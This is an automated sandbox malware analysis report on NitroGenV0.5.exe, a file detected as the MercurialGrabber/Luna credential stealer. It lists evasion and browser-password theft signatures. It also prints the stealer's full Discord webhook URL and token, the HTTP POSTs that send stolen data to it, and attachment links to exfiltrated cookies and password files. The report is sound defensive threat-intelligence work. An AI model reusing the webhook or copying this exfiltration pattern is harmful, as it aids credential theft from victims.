Windows Analysis Report https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe

Overview

General Information

Sample URL: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Analysis ID: 517177
Infos:

Most interesting Screenshot:

Detection

MercurialGrabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected MercurialGrabber
Antivirus detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
PE file contains strange resources
Drops PE files
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Classification

AV Detection:

barindex
Found malware configuration
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
Yara detected MercurialGrabber
Source: Yara match File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Avira: detection malicious, Label: HEUR/AGEN.1143801
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Avira: detection malicious, Label: HEUR/AGEN.1143801

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBB20E CryptUnprotectData, 6_2_00007FFC08BBB20E
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBB241 CryptUnprotectData, 6_2_00007FFC08BBB241
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBB25E CryptUnprotectData, 6_2_00007FFC08BBB25E
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC0893AD7A CryptUnprotectData, 17_2_00007FFC0893AD7A
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC0893B25E CryptUnprotectData, 17_2_00007FFC0893B25E

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp, NitroGenV0.5.exe, 00000006.00000002.304401796.000000001BBE5000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.351164827.000000001C910000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp String found in binary or memory: http://discord.com
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350437000.00000000027D9000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr String found in binary or memory: http://ip-api.com//json/
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com//json/84.17.52.68
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.comx
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmp String found in binary or memory: http://ip4.seeip.org
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wget.exe, wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/Ni
Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp, cmdline.out.1.dr String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe$
Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe0
Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe9
Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe;
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810248877211688/cookies.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810251381211176/passwords.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810260252164166/Capture.jpg
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.dr String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810339021168680/cookies.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.dr String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810341642612736/passwords.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.dr String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810352568766474/Capture.jpg
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp String found in binary or memory: https://discord.com
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, NitroGenV0.5.exe.6.dr String found in binary or memory: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp String found in binary or memory: https://discord.com8
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp String found in binary or memory: https://discord.comx
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr String found in binary or memory: https://discordapp.com/api/v8/users/
Source: NitroGenV0.5.exe.6.dr String found in binary or memory: https://i.imgur.com/vgxBhmx.png
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr String found in binary or memory: https://ip4.seeip.org
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.org/
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.orgx
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.dr String found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810248877211688/cookies.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.dr String found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810251381211176/passwords.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.dr String found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810260252164166/Capture.jpg
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.dr String found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810339021168680/cookies.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.dr String found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810341642612736/passwords.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.dr String found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810352568766474/Capture.jpg
Source: NitroGenV0.5.exe, 00000006.00000002.302816261.0000000002D42000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350548671.000000000285E000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr String found in binary or memory: https://www.countryflags.io/
Source: NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp String found in binary or memory: https://www.countryflags.io/CH/flat/48.png
Source: unknown HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected MercurialGrabber
Source: Yara match File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Yara signature match
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
